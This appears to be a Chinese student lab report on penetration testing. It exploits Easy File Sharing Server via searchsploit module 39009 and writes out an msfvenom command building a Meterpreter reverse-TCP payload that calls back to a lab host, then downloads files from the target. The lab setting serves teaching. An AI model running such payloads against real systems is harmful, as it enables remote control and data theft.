- 实验目的和要求
一、漏洞渗透测试
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
3、利用该漏洞,使得靶机运行计算器。P116-119
二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。
P121-123;140-145
2.实验步骤
一、漏洞渗透测试
1.安装一个windows虚拟机,用他来当做靶机。
2.为了将easy file sharing 拖动到靶机中进行安装,需要在虚拟机安装VMware Tools,一直点next即可。
3.把下载好的easy file sharing 拖动到靶机中进行安装,一直next就好。 点击try it就行。
4.回到kali虚拟机,打开Nmap功能。
使用命令:nmap -sV -A -o easy-file.txt ip 扫描
( sV 服务版本识别 -A 强力检测选项,得到更多信息 -o 将扫描结果写入文件)
5.等待几分钟后,我们扫出如下画面,我们知道靶机正在运行这些服务
6.下一步我们使用命令:searchsploit easy file sharing 查找到和easy file sharing相关的漏洞模块
7.使用命令:searchsploit -m 39009
8.利用python的一个代码脚本来写:python2 path:后面的那串 ip 80
9.done显示已经完成,返回windows靶机发现打开了一个计算器
二、Metasploit应用
1.在kaili 终端输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.211.128 lport=5000 -f exe -o /root/payload.exe
2.root目录下生成payload.exe 文件。提前关闭防火墙和杀毒软件将其拖放到靶机window10上,
然后打开它,回到kali
3.输入命令msfconsole启动meterpreter
4.依次输入截图指令
5.使用search命令搜索指定文件并下载靶机上感兴趣的文件即可
复现结果: